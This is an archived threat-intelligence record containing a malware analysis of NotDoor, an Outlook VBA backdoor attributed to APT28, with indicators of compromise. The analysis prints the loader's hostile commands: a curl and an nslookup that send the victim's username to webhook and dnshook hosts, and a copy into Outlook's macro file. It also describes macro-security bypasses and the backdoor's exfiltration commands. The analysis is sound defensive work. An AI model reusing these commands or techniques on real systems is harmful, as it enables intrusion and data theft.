{
	"id": "04334779-2ca3-4b63-8b24-91e9bae4821e",
	"created_at": "2026-04-06T00:15:19.506302Z",
	"updated_at": "2026-04-10T03:37:00.123377Z",
	"deleted_at": null,
	"sha1_hash": "b8fec7ffc8e0cf0cd34b1fd94eb7bbeca4408f84",
	"title": "Analyzing NotDoor: Inside APT28’s Expanding Arsenal",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 265128,
	"plain_text": "Analyzing NotDoor: Inside APT28’s Expanding Arsenal\r\nPublished: 2025-09-03 · Archived: 2026-04-05 16:41:45 UTC\r\nLAB52, the intelligence team at S2 Grupo, has identified a new backdoor for Outlook attributed to the persistent\r\nthreat group APT28, which is linked to the Russian intelligence service and has compromised multiple companies\r\nfrom various sectors in NATO member countries.\r\nThe artefact, dubbed NotDoor due to the use of the word ‘Nothing’ within the code, is a VBA macro for Outlook\r\ndesigned to monitor incoming emails for a specific trigger word. When such an email is detected, it enables an\r\nattacker to exfiltrate data, upload files, and execute commands on the victim’s computer.\r\nBackdoor setup\r\nTo evade detection, the backdoor will be deployed via the legitimate signed binary Microsoft OneDrive.exe\r\nsigned binary, which is vulnerable to the DLL side-loading technique. This process will load the malicious DLL\r\nSSPICLI.dll, , responsible for installing the VBA backdoor and disabling multiple macro security protections.\r\nThe attacker would have previously placed the backdoor in c:\\programdata\\testtemp.ini to enable this execution\r\nchain.\r\nMalicious DLL detections\r\nThe loader will run three PowerShell commands, each encoded in Base64.\r\nEncoded PowerShell command\r\nThe first command will copy the file c:\\programdata\\testtemp.ini to\r\n%APPDATA%\\Microsoft\\Outlook\\VbaProject.OTM, which contains the macros that Outlook will execute.\r\nhttps://lab52.io/blog/analyzing-notdoor-inside-apt28s-expanding-arsenal/\r\nPage 1 of 7\n\n$a=$env:APPDATA;copy c:\\programdata\\testtemp.ini \"$a\\Microsoft\\Outlook\\VbaProject.OTM\"\r\nThe second command performs an nslookup on a domain incorporating the username, using the webhook.site\r\nDNS hooking service previously employed in the group’s campaigns. This appears to serve as a mechanism for\r\nthe attackers to verify that the code executed successfully on the victim’s machine.\r\nnslookup \"$env:USERNAME.910cf351-a05d-4f67-ab8e-6f62cfa8e26d.dnshook[.site\"\r\nFinally, the third command sends a curl request to a webhook.site URL, serving the same purpose.\r\ncmd /c curl \"hxxp://webhook[.site/910cf351-a05d-4f67-ab8e-6f62cfa8e26d?$env:USERNAME\"\r\nThe loader establishes persistence by enabling the LoadMacroProviderOnBoot subkey within the\r\nSoftware\\Microsoft\\Office\\16.0\\Outlook registry key.\r\nPersistence\r\nNext, the loader enables macro execution by modifying the Level subkey under\r\nSoftware\\Microsoft\\Office\\16.0\\Outlook\\Security in the Windows registry.\r\nMacro activation\r\nhttps://lab52.io/blog/analyzing-notdoor-inside-apt28s-expanding-arsenal/\r\nPage 2 of 7\n\nFinally, dialogue messages are disabled by modifying the\r\nSoftware\\Microsoft\\Office\\16.0\\Outlook\\Options\\General registry key, reducing the likelihood of detection by\r\nthe user.\r\nDeactivation of dialogue messages\r\nNotDoor: a silent backdoor\r\nThe backdoor will be a VBA project for Outlook that, at the time of analysis, presents few detections.\r\nNotDoor backdoor detections\r\nThe malware leverages the Application_MAPILogonComplete and Application_NewMailEx events to execute\r\ncode whenever Outlook is started or a new email arrives. The project is obfuscated, with variable and function\r\nnames replaced by random alphabetic strings to conceal its behavior. Additionally, the malware employs a unique\r\nstring encoding technique for both internal data and dynamically generated strings. This method involves\r\nprepending random alphanumeric characters to a valid Base64 string, creating the illusion of encryption when\r\ndecoded.\r\nCustom encryption\r\nUpon logging in, the malware will create a folder at the path %TEMP%\\Temp if it does not already exist. This\r\nfolder serves as a repository for various artifacts generated during the malware’s operation. If the folder contains\r\nany files when the malware starts, their contents will be sent via email to a.matti444@proton[.me, with the\r\nsubject line “Re: 0”, after which the files will be deleted, regardless of whether they were successfully sent or not.\r\nhttps://lab52.io/blog/analyzing-notdoor-inside-apt28s-expanding-arsenal/\r\nPage 3 of 7\n\nExample to sent email at logon\r\nWhen the client receives an email, it first checks for the presence of a specific string on a designated line that\r\ntriggers the backdoor functions. If the string is found, the malware parses the email’s contents to extract the\r\ncommands to be executed. In the analyzed sample, this trigger string is “Daily Report”; however, the backdoor\r\nallows multiple triggers to be configured, so the string may vary in other instances. Once the backdoor is\r\nactivated, the email that triggered it is deleted.\r\nTrigger\r\nThe received email must follow a specific structure. First, it must include a numerical value that serves as an\r\nidentifier. Next, it must contain an email address for data exfiltration, which is encrypted using the malware’s\r\ncustom encryption algorithm. Finally, the malware supports multiple commands per email, also encrypted using\r\nthe same algorithm. Below is an example of an email that would trigger the backdoor’s functionality.\r\nExample of email\r\nIn particular, the malware allows the following four commands.\r\nCommand Description\r\ncmd Executes commands and returns the standard output as an email attachment.\r\ncmdno Executes commands.\r\nhttps://lab52.io/blog/analyzing-notdoor-inside-apt28s-expanding-arsenal/\r\nPage 4 of 7\n\ndwn\r\nExfiltrates files from the victim’s computer by sending them as email\r\nattachments.\r\nupl\r\nUpload files directly onto the victim’s computer.\r\nList of commands\r\nThe results of these commands will be sent to the sender using an email with the subject line in the following\r\nformat: “Re: \u003cID\u003e \u003cEMAIL SUBJECT\u003e”. The files will be sent as attachments and the results of the execution\r\nwill be sent in the body of the email.\r\nExample of an email sent when the backdoor is activated\r\nFiles exfiltrated by the malware are saved in the folder. Each file is named using a predefined list of names and\r\nextensions, following the format \u003cNAME\u003e_\u003cID\u003e.\u003cEXTENSION\u003e. The file contents are encoded using the\r\nmalware’s custom encryption, sent via email, and then deleted from the system.\r\nGenerated file\r\nBelow is a list of possible filenames.\r\nreport\r\ninvoice\r\ncontract\r\nphoto\r\nscheme\r\ndocument\r\nBelow is a list of possible extensions.\r\njpg\r\njpeg\r\ngif\r\nhttps://lab52.io/blog/analyzing-notdoor-inside-apt28s-expanding-arsenal/\r\nPage 5 of 7\n\nbmp\r\nico\r\npng\r\npdf\r\ndoc\r\ndocx\r\nxls\r\nxlsx\r\nppt\r\npptx\r\nmp3\r\nmp4\r\nxml\r\nConclusion\r\nIn conclusion, this article highlights the ongoing evolution of APT28, demonstrating how it continuously\r\ngenerates new artefacts capable of bypassing established defense mechanisms. Below is a series of indicators of\r\ncompromise that could help detect the threat.\r\nIndicators of Compromise (IOC)\r\nSHA256 Description\r\nfcb6dc17f96af2568d7fa97a6087e4539285141206185aec5c85fa9cf73c9193\r\nonedrive.exe\r\n(legit)\r\n5a88a15a1d764e635462f78a0cd958b17e6d22c716740febc114a408eef66705 SSPICLI.dll\r\n8f4bca3c62268fff0458322d111a511e0bcfba255d5ab78c45973bd293379901 testtemp.ini\r\nNetwork indicator Description\r\na.matti444@proton[.me Email used for exfiltration\r\nPath Description\r\n%Temp%\\Test Folder generated by backdoor\r\nc:\\programdata\\testtemp.ini Observed artifact\r\nReferences\r\n[1] CERT Polska. (2024, May 8). APT28 campaign targeting Polish government institutions. CERT Polska.\r\nhttps://cert.pl/en/posts/2024/05/apt28-campaign/\r\nhttps://lab52.io/blog/analyzing-notdoor-inside-apt28s-expanding-arsenal/\r\nPage 6 of 7\n\nSource: https://lab52.io/blog/analyzing-notdoor-inside-apt28s-expanding-arsenal/\r\nhttps://lab52.io/blog/analyzing-notdoor-inside-apt28s-expanding-arsenal/\r\nPage 7 of 7",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://lab52.io/blog/analyzing-notdoor-inside-apt28s-expanding-arsenal/"
	],
	"report_names": [
		"analyzing-notdoor-inside-apt28s-expanding-arsenal"
	],
	"threat_actors": [
		{
			"id": "730dfa6e-572d-473c-9267-ea1597d1a42b",
			"created_at": "2023-01-06T13:46:38.389985Z",
			"updated_at": "2026-04-10T02:00:02.954105Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"Pawn Storm",
				"ATK5",
				"Fighting Ursa",
				"Blue Athena",
				"TA422",
				"T-APT-12",
				"APT-C-20",
				"UAC-0001",
				"IRON TWILIGHT",
				"SIG40",
				"UAC-0028",
				"Sofacy",
				"BlueDelta",
				"Fancy Bear",
				"GruesomeLarch",
				"Group 74",
				"ITG05",
				"FROZENLAKE",
				"Forest Blizzard",
				"FANCY BEAR",
				"Sednit",
				"SNAKEMACKEREL",
				"Tsar Team",
				"TG-4127",
				"STRONTIUM",
				"Grizzly Steppe",
				"G0007"
			],
			"source_name": "MISPGALAXY:APT28",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e3767160-695d-4360-8b2e-d5274db3f7cd",
			"created_at": "2022-10-25T16:47:55.914348Z",
			"updated_at": "2026-04-10T02:00:03.610018Z",
			"deleted_at": null,
			"main_name": "IRON TWILIGHT",
			"aliases": [
				"APT28 ",
				"ATK5 ",
				"Blue Athena ",
				"BlueDelta ",
				"FROZENLAKE ",
				"Fancy Bear ",
				"Fighting Ursa ",
				"Forest Blizzard ",
				"GRAPHITE ",
				"Group 74 ",
				"PawnStorm ",
				"STRONTIUM ",
				"Sednit ",
				"Snakemackerel ",
				"Sofacy ",
				"TA422 ",
				"TG-4127 ",
				"Tsar Team ",
				"UAC-0001 "
			],
			"source_name": "Secureworks:IRON TWILIGHT",
			"tools": [
				"Downdelph",
				"EVILTOSS",
				"SEDUPLOADER",
				"SHARPFRONT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "ae320ed7-9a63-42ed-944b-44ada7313495",
			"created_at": "2022-10-25T15:50:23.671663Z",
			"updated_at": "2026-04-10T02:00:05.283292Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"APT28",
				"IRON TWILIGHT",
				"SNAKEMACKEREL",
				"Group 74",
				"Sednit",
				"Sofacy",
				"Pawn Storm",
				"Fancy Bear",
				"STRONTIUM",
				"Tsar Team",
				"Threat Group-4127",
				"TG-4127",
				"Forest Blizzard",
				"FROZENLAKE",
				"GruesomeLarch"
			],
			"source_name": "MITRE:APT28",
			"tools": [
				"Wevtutil",
				"certutil",
				"Forfiles",
				"DealersChoice",
				"Mimikatz",
				"ADVSTORESHELL",
				"Komplex",
				"HIDEDRV",
				"JHUHUGIT",
				"Koadic",
				"Winexe",
				"cipher.exe",
				"XTunnel",
				"Drovorub",
				"CORESHELL",
				"OLDBAIT",
				"Downdelph",
				"XAgentOSX",
				"USBStealer",
				"Zebrocy",
				"reGeorg",
				"Fysbis",
				"LoJax"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434519,
	"ts_updated_at": 1775792220,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/b8fec7ffc8e0cf0cd34b1fd94eb7bbeca4408f84.pdf",
		"text": "https://archive.orkl.eu/b8fec7ffc8e0cf0cd34b1fd94eb7bbeca4408f84.txt",
		"img": "https://archive.orkl.eu/b8fec7ffc8e0cf0cd34b1fd94eb7bbeca4408f84.jpg"
	}
}